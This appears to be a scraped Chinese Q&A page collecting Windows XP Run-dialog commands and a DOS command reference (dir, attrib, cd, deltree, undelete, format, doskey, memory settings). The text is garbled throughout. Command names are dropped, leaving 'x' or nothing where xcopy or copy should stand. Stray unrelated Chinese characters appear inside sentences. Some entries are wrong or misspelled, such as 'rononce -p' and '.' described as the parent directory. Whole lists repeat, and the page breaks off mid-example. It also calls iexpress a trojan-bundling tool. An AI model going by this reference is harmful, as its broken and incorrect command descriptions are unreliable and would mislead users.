ras共享文件夹

① 计算机常用的命令

我有
DOS命令大全.doc
DOS命令详解.doc
Windows常用网络命令及命令实例详解.doc
键盘组合功能.doc
开始运行命令集锦.doc

好象都符合你的要求，要的话，EMAIL给来。发给你，但是收到后记得多给点分，这是我长时间收集来的。

已发，去收，收到后加分哦。

去收，别说又丢了。
[email protected]

② 系统命令

他的太乱了~看我的吧！
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令

dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器

net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员C作请求
netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护

tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器

eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器

packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器

regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序

osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令

iexpress-------木马捆绑工具，系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略

...-----我的电脑

winver 检查Windows版本
wmimgmt.msc 打开Windows管理体系结构(wmi)
wupdmgr Windows更新程序
wscript Windows脚本宿主设置
write 写字板
winmsd 系统信息
wiaacmgr 扫描仪和照相机向导
winchat xp自带局域网聊天
mem.exe 显示内存使用情况
msconfig.exe 系统配置实用程序
mplayer2 简易widnows media player
mspaint 画图板
mstsc 远程桌面连接
mplayer2 媒体播放机
magnify 放大镜实用程序
mmc 打开控制台
mobsync 同步命令

dxdiag 检查directx信息
drwtsn32 系统医生
devmgmt.msc 设备管理器
dfrg.msc 磁盘碎片整理程序
diskmgmt.msc 磁盘管理实用程序
dcomcnfg 打开系统组件服务
ddeshare 打开dde共享设置
dvdplay dvd播放器

net stop messenger 停止信使服务
net start messenger 开始信使服务
notepad 打开记事本
nslookup 网络管理的工具向导
ntbackup 系统备份和还原
narrator 屏幕“讲述人”
ntmsmgr.msc 移动存储管理器
ntmsoprq.msc 移动存储管理员操作请求
netstat -an （tc）命令检查接口

syncapp 创建一个公文包
sysedit 系统配置编辑器
sigverif 文件签名验证程序
sndrec32 录音机
shrpubw 创建共享文件夹
secpol.msc 本地安全策略
syskey 系统加密，一旦加密就不能解开，保护Windows xp系统的双重密码
services.msc 本地服务设置
sndvol32 音量控制程序
sfc.exe 系统文件检查器
sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令
tourstart xp简介（安装完成后出现的漫游xp程序）
taskmgr 任务管理器

eventvwr 事件查看器
eudcedit 造字程序
explorer 打开资源管理器

packager 对象包装程序
perfmon.msc 计算机性能监测程序
progman 程序管理器

regedit.exe 注册表
rsop.msc 组策略结果集
regedt32 注册表编辑器
rononce -p 15秒关机
regsvr32 /u *.dll 停止dll文件运行
regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁盘检查
certmgr.msc 证书管理实用程序
calc 启动计算器
charmap 启动字符映射表
cliconfg sql server 客户端网络实用程序
clipbrd 剪贴板查看器
conf 启动netmeeting
compmgmt.msc 计算机管理
cleanmgr 垃圾整理
ciadv.msc 索引服务程序

osk 打开屏幕键盘
odbcad32 odbc数据源管理器
oobe/msoobe /a 检查xp是否激活
lusrmgr.msc 本机用户和组
logoff 注销命令

iexpress 木马捆绑工具，系统自带

nslookup ip地址侦测器

fsmgmt.msc 共享文件夹管理器

utilman 辅助工具管理器

gpedit.msc 组策略

以下为Windows操作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!!

运行\输入CMD\输入 对应的相关实用程序:
. 打开C:＼Documents and Settings＼XXX(当前登录Windows XP的用户名)
.. 打开Windows XP所在的盘符下的Documents and Settings文件夹
... 打开“我的电脑”选项。
accwiz.exe 辅助工具向导
actmovie.exe 直接显示安装工具
append.exe 允许程序打开制定目录中的数据
arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe 计划运行任务
atmadm.exe ATM调用管理器统计
attrib.exe 显示和更改文件和文件夹属性
autochk.exe 检测修复文件系统 (XP不可用)
autoconv.exe 在启动过程中自动转化系统 (XP不可用)
autofmt.exe 在启动过程中格式化进程 (XP不可用)
autolfn.exe 使用长文件名格式 (XP不可用)
arp.exe 显示和更改计算机的IP与硬件物理地址的对应
calc.exe 计算器
Bootvrfy.exe 通报启动成功
cacls.exe 显示和编辑ACL
cdplayer.exe CD播放器
change.exe 与终端服务器相关的查询 (XP不可用)
charmap.exe 字符映射表
chglogon.exe 启动或停用会话记录 (XP不可用)
chgport.exe 改变端口（终端服务） (XP不可用)
chgusr.exe 改变用户（终端服务） (XP不可用)
chkdsk.exe 磁盘检测程序
chkntfs.exe NTFS磁盘检测程序
cidaemon.exe 组成Ci文档服务
cipher.exe 在NTFS上显示或改变加密的文件或目录
cisvc.exe 打开索引内容
ckcnv.exe 变换Cookie
cleanmgr.exe 磁盘清理
cliconfg.exe SQL客户网络工具
clipbrd.exe 剪贴簿查看器
clipsrv.exe 运行Clipboard服务
clspack.exe 建立系统文件列表清单
cluster.exe 显示域的集群 (XP不可用)
cmd.exe 进2000\XP DOS
cmdl32.exe 自动下载连接管理
cmmgr32.exe 连接管理器
cmmon32.exe 连接管理器监视
cmstp.exe 连接管理器配置文件安装程序
comclust.exe 集群
comp.exe 比较两个文件和文件集的内容
conf 启动netmeeting聊天工具
control userpasswords2 XP密码管理.
compmgmt.msc 计算机管理
cprofile.exe 转换显示模式 (XP不可用)
开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名
工作站处于活动状态（即网络描述） \软件版本（即软件版本号） \工作站域 工作站域的 DNS 名称
登录域 \COM 打开时间超时（秒） \COM 发送量（字节） \COM 发送超时 (msec)
CMD\输入net config workstation 更改可配置工作站服务设置。
CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本（即软件版本号）
服务器处于活动状态（即网络描述） \服务器处于隐藏状态（即 /hidden 设置）
最大登录用户数（即可使用服务器共享资源的最大用户数）
每个会话打开文件的最大数（即用户可在一个会话中打开服务器文件的最大数）
空闲会话时间（最小值）
chkdsk.exe 磁盘检查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件
cleanmgr 垃圾整理
Clipbrd 剪贴板查看器
C:boot.ini 打开启动菜单
compact.exe 显示或改变NTFS分区上文件的压缩状态
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 转换文件系统到NTFS
convlog.exe 转换IIS日志文件格式到NCSA格式
cprofile.exe 转换显示模式
cscript.exe 较本宿主版本
csrss.exe 客户服务器Runtime进程 (XP不可用)
csvde.exe 格式转换程序 (XP不可用)
dcpromo 活动目录安装(XP不可用)
drwtsn32 系统医生
diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 设备管理器(检查电脑硬件,驱动)
dxdiag 检查DirectX信息
dcomcnfg.exe DCOM配置属性 (控制台根目录)
dcpromo.exe 安装向导 (XP不可用)
ddeshare.exe DDE共享
debug.exe 检查DEBUG
dfrgfat.exe FAT分区磁盘碎片整理程序
dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS树 (XP不可用)
dfsinit.exe 分布式文件系统初始化(XP不可用)
dfssvc.exe 分布式文件系统服务器 (XP不可用)
diantz.exe 制作CAB文件
diskperf.exe 磁盘性能计数器
dmremote.exe 磁盘管理服务的一部分 (XP不可用)
doskey.exe 命令行创建宏
dosx.exe DOS扩展
dplaysvr.exe 直接运行帮助 (XP不可用)
drwatson.exe 华生医生错误检测
drwtsn32.exe 华生医生显示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X诊断工具
edlin.exe 命令行的文本编辑
esentutl.exe MS数据库工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 转换EXE文件到二进制
expand.exe 解压缩
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夹
fastopen.exe 快速访问在内存中的硬盘文件
faxcover.exe 传真封面编辑
faxqueue.exe 显示传真队列
faxsend.exe 发送传真向导
faxsvc.exe 启动传真服务
fc.exe 比较两个文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一个用户并显示出统计结果
fixmapi.exe 修复MAPI文件
flattemp.exe 允许或者禁用临时文件目录 (XP不可用)
fontview.exe 显示字体文件中的字体
forcedos.exe 强制文件在DOS模式下运行
ftp.exe FTP下载
gpedit.msc 组策略
gdi.exe 图形界面驱动
grpconv.exe 转换程序管理员组
hostname.exe 显示机器的Hostname
Internat 输入法图标
iexpress 木马捆绑工具，系统自带
ieshwiz.exe 自定义文件夹向导
iexpress.exe iexpress安装包
iisreset.exe 重启IIS服务(未安装IIS,不可用)
internat.exe 键盘语言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全监视器
ipxroute.exe IPX路由和源路由控制程序
irftp.exe 无线连接
ismserv.exe 安装或者删除Service Control Manager中的服务
jdbgmgr.exe Java4的调试器
jetconv.exe 转换Jet Engine数据库 (XP不可用)
jetpack.exe 压缩Jet数据库 (XP不可用)
jview.exe Java的命令行装载者
label.exe 改变驱动器的卷标
lcwiz.exe 许可证向导 (XP不可用)
ldifde.exe LDIF目录交换命令行管理 (XP不可用)
licmgr.exe 终端服务许可协议管理 (XP不可用)
lights.exe 显示连接状况 (XP不可用)
llsmgr.exe Windows 2000 许可协议管理 (XP不可用)
llssrv.exe 启动许可协议服务器 (XP不可用)
locator.exe RPC Locator 远程定位
lodctr.exe 调用性能计数
logoff.exe 注销当前用户
lpq.exe 显示远端的LPD打印队列的状态，显示被送到基于Unix的服务器的打印任务
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe 运行LSA和Server的DLL
lserver.exe 指定默认Server新的DNS域 (XP不可用)
lusrmgr.msc 本地账户管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大镜
makecab.exe 制作CAB文件
mem.exe 显示内存状态
migpwd.exe 迁移密码
mmc.exe 控制台
mnmsrvc.exe 远程桌面共享
mobsync.exe 同步目录管理器
mountvol.exe 创建、删除或列出卷的装入点。
mplay32.exe Media Player 媒体播放器
mpnotify.exe 通知应用程序
mqbkup.exe 信息队列备份和恢复工具
mqmig.exe MSMQ Migration Utility 信息队列迁移工具
mrinfo.exe 使用SNMP多点传送路由
mscdexnt.exe 安装MSCD
msdtc.exe 动态事务处理控制台
msg.exe 发送消息到本地或远程客户
mshta.exe HTML应用程序主机
msiexec.exe 开始Windows安装程序
mspaint.exe 打开画图板
mstask.exe 任务计划表程序
mstinit.exe 任务计划表安装
Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)
mem.exe 显示内存使用情况
mspaint 画图板
Net Stop Messenger 停止信使服务
Net Start Messenger 恢复信使服务
nslookup 网络管理的工具
Nslookup IP 地址侦测器
ntbackup 系统备份和还原
nbtstat.exe 使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。
nddeapir.exe NDDE API服务器端
netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)
netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe 打开记事本
nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe 备份和故障修复工具
ntfrs.exe NT文件复制服务 (XP不可用)
ntvdm.exe 模拟16位Windows环境
nw16.exe NetWare转向器
nwscript.exe 运行Netware脚本
odbcad32.exe 32位ODBC数据源管理 (驱动程序管理)
odbcconf.exe 命令行配置ODBC驱动和数据源
packager.exe 对象包装程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 检查Pentium的浮点错误
perfmon.exe 系统性能监视器
ping.exe 验证与远程计算机的连接
posix.exe 用于兼容Unix
print.exe 打印文本文件或显示打印队列的内容。
progman.exe 程序管理器
psxss.exe Posix子系统应用程序
qappsrv.exe 在网络上显示终端服务器可用的程序
qprocess.exe 在本地或远程显示进程的信息（需终端服务）
query.exe 查询进程和对话 (XP不可用)
quser.exe 显示用户登陆的信息（需终端服务）
qwinsta.exe 显示终端服务的信息
rononce -p 15秒关机
rasAdmin 远程访问服务.
regedit.exe 注册表编辑器
rasadmin.exe 启动远程访问服务 (XP不可用)
rasautou.exe 建立一个RAS连接
rasdial.exe 宽带,拨号连接
ras.exe 运行RAS连接 (XP不可用)
rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe 终端和本地复制和粘贴文件
recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe 运行重定向服务
regedt32.exe 32位注册服务
regini.exe 用脚本修改注册许可
regwiz.exe 注册向导
replace.exe 用源目录中的同名文件替换目标目录中的文件。
rexec.exe rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 TCP/IP 协议后才可以使用该命令。
risetup.exe 运行远程安装向导服务 (XP不可用)
route.exe 控制网络路由表
rsh.exe 在运行 RSH 服务的远程计算机上运行命令
rsnotify.exe 远程存储通知回显
runas.exe 允许用户用其他权限运行指定的工具和程序
rundll32.exe 启动32位DLL程序
rwinsta.exe 重置会话子系统硬件和软件到最初的值
Sndvol32 音量控制程序
sfc.exe 或CMD\ sfc.exe 回车 系统文件检查器
services.msc 网络连接服务
syskey 系统加密，(一旦加密就不能解开，保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢复最近的注册表
secedit.exe 自动化安全性配置管理
services.exe 控制所有服务
sethc.exe 设置高对比
setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe 系统文件检查
shadow.exe 监控另外一台中端服务器会话
shrpubw.exe 建立和共享文件夹
sigverif.exe 文件签名验证
smlogsvc.exe 性能日志和警报 (XP不可用)
sndrec32.exe 录音机
sndvol32.exe 显示声音控制信息
snmp.exe 简单网络管理协议 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 服务器管理器 (XP不可用)
subst.exe 将路径与驱动器盘符关联
sysedit.exe 系统配置编辑器
syskey.exe NT账号数据库加密工具
sysocmgr.exe > Windows 安装程序
systray.exe 在低权限运行systray
taskmgr 任务管理器
tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)
tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(
taskman.exe 任务管理器 (XP不可用)
taskmgr.exe 任务管理器
tcmsetup.exe 电话服务客户安装
tcpsvcs.exe TCP服务
termsrv.exe 终端服务
tftp.exe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
themes.exe 桌面主题 (XP不可用)
tlntadmn.exe Administrator Telnet服务管理
tlntsess.exe 显示目前的Telnet会话
tlntsvr.exe 开始Telnet服务
tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标，以决定到达目标采用的路由
tsadmin.exe Administrator 终端服务管理器 (XP不可用)
tscon.exe 粘贴用户会话到终端对话
tsdiscon.exe 断开终端服务的用户
tskill.exe 杀掉终端服务
tsprof.exe 用终端服务得出查询结果
tsshutdn.exe 关闭系统
unlodctr.exe 性能监视器的一部分
upg351db.exe 升级Jet数据库 (XP不可用)
ups.exe UPS service UPS服务
user.exe Windows核心服务
userinit.exe 打开我的文档
usrmgr.exe 域用户管理器
utilman.exe 指定2000启动时自动打开那台机器
vwipxspx.exe 调用IPX/SPX VDM
w32tm.exe 时间服务器
wextract.exe 解压缩Windows文件
winchat.exe 打开Windows聊天工具
winhlp32.exe 运行帮助系统
winmsd.exe 查看系统信息
winver.exe 显示Windows版本
wizmgr.exe Windows管理向导 (XP不可用)
wjview.exe Java 命令行调用Java
write.exe 打开写字板
wscript.exe 脚本工具
wupdmgr.exe Windows update 运行Windows update升级向导
winver 检查Windows版本
Win98系统工具
开始,运行,输入Msconfig 系统配置实用工具 配置启动选项，包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。
开始,运行,输入Regedit 注册表修改工具 注册表编辑器，如果没有把握不要随意修改注册表！
开始,运行,输入Regsvr32 dll注册工具 当提示找不到dll文件时，可用此来注册该动态连接库。
开始,运行,输入Regwiz 注册向导 用于注册。校验系统文件，并可恢复系统文件。
如果启动时出现类似*.vxd文件错误，可用此恢复该vxd文件。
开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误，可用来初步修复。
开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。
开始,运行,输入NETSCAPE

ESC：清除当前命令行；
F7：显示命令历史记录，以图形列表窗的形式给出所有曾经输入的命令，并可用上下箭头键选择再次执行该命令。
F8：搜索命令的历史记录，循环显示所有曾经输入的命令，直到按下回车键为止；
F9：按编号选择命令，以图形对话框方式要求您输入命令所对应的编号(从0开始)，并将该命令显示在屏幕上；
Ctrl+H：删除光标左边的一个字符；
Ctrl+C Ctrl+Break，强行中止命令执行；
Ctrl+M：表示回车确认键；
Alt+F7：清除所有曾经输入的命令历史记录；
Alt+PrintScreen：截取屏幕上当前命令窗里的内容。
病毒破坏了系统文件，请使用杀毒软件查杀病毒，然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可。

按F8进入DOS模式，运行SCANREG/RESTORE命令恢复最近的注册表
按F8进入安全模式，在运行里输入SFC，系统文件检查

③ 恳求DOS命令

dos命令

dos下各种常见命令索引

▲ dir

▲ attrib

▲ cd

▲

▲ x

▲ del

▲ undelete

▲ deltree

▲ dos=high

▲ doskey

▲ emm386.exe

▲ fc

▲ format

▲ unformat

▲ interlnk

▲ intersvr

▲ memmaker

▲ memitem等

▲ mscdex

▲ msd

▲ prompt

▲ ramdrive

▲ subst

▲ mem

▲ "> < >> <<"工具

▲ move

▲ append

▲ call

▲ defrag

▲ device

一、DIR 命令的格式：

dir [D:][PATH][NAME][[/A][:attrib]][/o:[sorted][/s][/b][/l][/c[h]

(1)dir /a:attrib 缺省包含所有文件(系统文件.隐含文件)

attrib[:][h/-h]只显示隐含文件或非隐含文件.

[r/-r]只显示只读文件或非只读文件

[s/-s]只显示系统文件或非系统文件

[a/-a]只显示要归档文件或非归档文件

(2)/o[:]sorted:缺省完全按字母顺序,子目录显示在文件之前

/o[n/-n]:按字母顺序或按文件名顺序/反向显示

[e/-e]:按扩展名字母顺序/反向显示

[d/-d]:按时间顺序/反向显示

[s/-s]:按大小从大到小或/反向显示

[g/-g]:按子目录先于文件或文件先于子目录

(3)/s 参数:对当前目录及其子目录中所有文件进行列表

列名:dir /s/a/o:n c:\>PRN

将c盘上的所有子目录和文件按隶属关系并根据子目录和文件字母顺序打印输出

(4)/B 参数:将只显示文件名与扩展名

(5)/L 参数:将全部用小写字母对文件或子目录进行列表

训练:

dir /a 列当前目录所有文件(含隐含及系统文件)

dir /ah 列隐含文件(包含子目录(隐含的) dir /a-h

dir /as 列系统文件 dir /a-s

dir /ad 列子目录 dir /a-d

dir /o 按字母顺序

dir /B 只显示文件名与扩展名

二、attrib [+r|-r] [+a|-a] [+s|-s] [+h|-h] [d: ] [name] [/s]

缺省 attrib name 显示文件的(文件)属性

attrib io.sys (或子目录)

shr c:\ io.sys 指定为系统(s) 隐含(h) 只读(r)文件

也可以attrib *.sys 显示扩展名为sys的文件属性

参数 [+r|-r] 将文件属性设置或解除 只读属性

[+a|-a] 将文件属性设置或解除 归档属性

[+h|-h] 将文件属性设置或解除 隐含属性 (尤其对子目录也起作用)

/s 参数 将当前及当前子目录下的所有文件均起作用

可以用来查找文件

例子:

attrib news86 列news86的文档属性

attrib +r report.txt 设置为只读 attrib -s -h record.txt

attrib +a a:*.*

attrib -a a:*.bak

x a: b: /a 将A盘上的所有标志为"归档"属性的轿裤慧文件拷到B盘

x a: b: /m 将A盘上的所有文件拷到B盘后并移去归档属性

三、cd 介绍: cd...返回上二级目录 "."纯启代表当前目录 "."代表父目录

cd ..\..返回到上级目录的父目录(祖目录)

cd A:\ 将A盘的当前目录改为根目录

cd A:\xx 将A盘的当前目录改为子目录xx下

cd ..\98 先返回父目录,再进入父目录下的98子目录

cd ..返回到父目录

cd\98 进入根目录下的98子目录

四、 [/y][/-y][/v][ /B]

/y 不加提示,对所有文件加以覆盖

/-y 加以提示,对所有文件 (yes或no提问 )

/v 拷贝以后加以校验

/B 按二进制进行显示

w1.wps con/b 可以将wps文件在屏幕上显示,而不必进入wps状态

..\98 将父目录下的98子目录下的所有文件全拷闭答到当前子目录

.\97 当当前目录下的97子目录下文件全部拷到当前目录

. c:\ 将当前目录下的所有文件拷到c盘根目录

. 意味着 *.* 文件

nul a.abc 将a.abc 文件清空(文件长度改为0)

文件名+con 向文本文件中追加命令或内容

con 文件名 创建文本文件(F6存盘退出)

con prn 检测打印机的开关

五、x命令

x [source] [d:date] [/p] [/s] [/e] [/v] [/y]

x [d:date] x a:b:\ /d:08/18/98/s/v 拷贝98.08.18年后的文件

x [/p] 提示创建子目录

x [/s] 连带子目录一起拷贝. 注意:若目标盘上不存在此子目录,而在目标

盘的结束符又不以"\"为结束,则将提示:

does destination specify a file name or directory name on the target

[f=file,d=directory]?

在目标盘上创建文件[按下]还是创建子目录[按下d] ?应选择d键

x[/v] 带较验

*:(1) x 不拷贝系统和隐含文件,应先予以修改属性再拷贝

x [/y] 覆盖时是否有提示, /y 不带提示

若省略目标盘或子目录名,则拷贝到当前目录下

六、 del /p

加/p 可以在删除前是否提示

如del后加子目录名,则将子目录下所有文件(隐含.系统.只读文件除外)全删除,

加/p则可以确认.

七、undelete [name] /au

不加提示地将所有满足条件的文件恢复(能够恢复的),并将首字母置成"#",若已

存在,则按"# % & 0 1 2-9 a-z"顺序加上.

如:undelete *.dbf/au 将扩展名为"dbf"的文件全恢复,并以"#"开头,作为文件

名, /list 仅列出可恢复的文件,而不恢复

undelete /load 将undelete装入内存

/unload 将undelete卸出内存

/s[drive]对指定驱动器进行监测管理

undelete/sc

将 undelete驻留内存,?并创建一个隐含的sentry 子目录对c盘删除的文件进行

管理 undelete/ds 恢复

相应恢复命令可以用undelete即可完整恢复出文件名(非常完整)

最常用undelete *.*

deltree /y [drive:path]

deltree 删除子目录及文件,尽管有些文件是系统文件或隐含文件

它可以带有通配符,带有通配符时,它将删除符合条件的文件及子目录

如:?undelete *.dbf/au 将扩展名为"dbf"的文件全恢复,并以"#"开头作为文件

名.

/list 仅列出可恢复的文件,而不作恢复操作.

undelete/load 将undelete 装入内存.

/unload将undelete 卸出内存.

/s[drive] 对指定的驱动器进行监视管理.

undelete/sc 将undelete 驻留内存,并创建一个隐含的sentry子目录对C盘删除

的文件进行管理.相应恢复命令可以用undelete/ds 即可完整恢复出文件名(很完善).

最常用的是undelete *.*

八、deltree /y [drive:path]

deltree 删除子目录及文件,尽管有些文件是系统或隐含的.

它可以带有通配符,这时它将删除符合条件的文件或子目录.

如:存在L1文件,L2子目录,L3文件,L4子目录

deltree L*.* 将删除以上所有的文件和子目录,但在删除前加以确认,若不删除,

可以输入"N".

/y 参数是在删除时不加以确认就进行操作的.

它删除的文件可以用undelete恢复,?但不能恢复子目录及其下的文件,可以用特

殊工具.如NORTON 8.0 等.

若提前使用了undelete/s,?则可以在sentry子目录下找到完整的文件,但名已经

改变了.

九、dos=high[|low[umb|noumb]]

dos=high,umb 则dos将自身装入高端内存(high)并能管理上位内存(umb).

noumb 则不管理上位内存.

在写入dos=high及umb 前应装入device=himem.sys

为了将程序或驱动程序装入上位内存,必须使用dos=umb,可省出大部分常规内存.

可以在config.sys的任何位置写上dos=high,umb

若显示hma not avoiable 或 load down low 则表明不能使用高端内存.

十、doskey 记录以前敲过的dos命令,可以用F7来显示,用"↑↓"来选择,用F9来输入

选择的命令号.

doskey/restall 重新装入一次,以前的命令行撤消.

doskey/history 显示内存中所有的命令,可以">"显示到其它文件中,缩写"/H".

doskey dir=cls 则击入dir等同于cls一样.

doskey/macros 可显示所有的宏定义,可使用">"重定义到文件中,可缩写"/M".

doskey dir= 可撤消对dir 的宏定义.

doskey p=dir$tdir*.exe/p$tdir c:\t$tdir c:\t$*

$t为命令的区分符,而$*为命令的结束符

doskey/insert(overstrike)?在重新输入命令时,对旧命令的修改是插入还是覆

盖状态(默认).

十一、emm386.exe

提供对扩展内存的管理,使应用程序象使用常规内存一样能够使用它.

常见的用法是 在config.sys 中

device=c:\dos\himem.sys

device=c:\dos\emm386.exe ram

d=64 将DMA 内存数量设置为64K

noems 提供对上位内存的访问,但不提供对扩展内存的访问.

应注意的是在windows中最好不要用它,因为windows本身有对扩展内存进行管理

的程序.应采用windows中的管理器.

十二、fc 命令 fc/b dt.dat dt2.dat>b (作二进制代码比较)

比较两个文件,一般用作存取进度,修改游戏存储文件用.

实际代码位置应加上0100 如:0000 05E4:00 67

实际用debug -e 修改时应加上0100 即 0000 06E4:00 67

后面加上重定向文件">P" 可以将比较结果输出到p文件中.

十三、format /q /u /s /n:sectors /f:size /c

/q参数:快速格式化,仅扫描文件分配表和根目录区,仅对格式化过的磁盘有效.

使用时应确保格式化过后没有增加新的坏道.

/u参数:无条件格式化,并且不保存原来盘上的信息,可以防止"unformat".

/s参数:格式化为系统盘,也可以使用"sys"命令.

/f:size size 可以为160 180 320 360 720 1200 1440 2800

/n:sector n可以为1 格式为单面盘,容量为160k 180k

可以为4 可以在5寸高密驱动器上格式化360k磁盘

可以为8 可以在5寸高密驱动器上进行8个扇区的格式化.

/c 重新测试坏扇区,缺省时如果一个扇区标记为"坏",以后格式时就不在从新测

试,仅作标记,使用"/C"时可以从新测试.

十四、unformat 命令

对用format 格式过,且未用"/u"参数的命令起作用,用它可以来重新修复已经损

坏的硬盘分区表,但对网络盘不起作用.

unformat drive:[/l][/test][/p]

/l 显示每一个被unformat发现的文件和子目录,如果没有这个开关,只显示那些

破碎的文件和子目录,可以用ctrl+s 暂停,按任意键继续.

/test 仅作一个测试,不作实际的修复工作,作模拟过程.

/p 一边测试一边打印.

注:这种方法不能保证修复所有的文件,尤其是格式化后又添加过数据的磁盘.

恢复后的文件依次存放在subdir1....2....3等子目录中.

十五、interlnk 语法 interlnk g=e ,它可以通过串口或并口在两机间进行通讯.

将服务器端上的e驱动器映射为客户端的g驱动器,以后对客户端而言,所有对g的

操作都意味着对服务器的访问,取消映射的办法为interlnk g=

单独输入interlnk 则显示所有的映射情况.

注意:interlnk 必须在装入interlnk.exe 设备驱动程序才可以使用.

所用的驱动器符号与config.?sys中lastdrv.exe设置的数目有关.可以作一个一

端为25针,另一端为9针的串行线实现,具体接线方式如下:

5 - 7 2 - 15

3 - 2 3 - 13

7 - 4 4 - 12

6 - 6 5 - 10

3 - 3 6 - 11

8 - 5 15 - 2

4 - 20 13 - 3

9针 25针 12 - 4

10 - 5

11 - 6

25 - 25

25针 25针

十六、interlnk.exe 与intersvr.exe

interlnk.exe 重新定向对于客户驱动器或打印接口的请求到另外的服务器驱动

器或打印机.

语法:config.sys 中加入:

device=c:\dos\interlnk.exe [drive:n][/noprinter][com][lpt]

十七、memmaker[/b][/batch][session][/swap:drive]

使用memmaker能够优化内存配置,?并将配置写入autoexec.bat和config.sys中.

在这一过程中,需要重新启动几次机器.

十八、memitem memcolor memdefault submenu 菜单选项include

autoexec.bat 中如下: config.sys中如下:

path c:\dos;c:\ucdos [menu]

doskey menucolor=15,1(前景色15,背景色1)

\mouse\mouse menuitem=base_config,this is a base

goto %config% ->选择项 menuitem=cced_config,this is a cced

选项 提示

:base_config menudefault=base_config,5

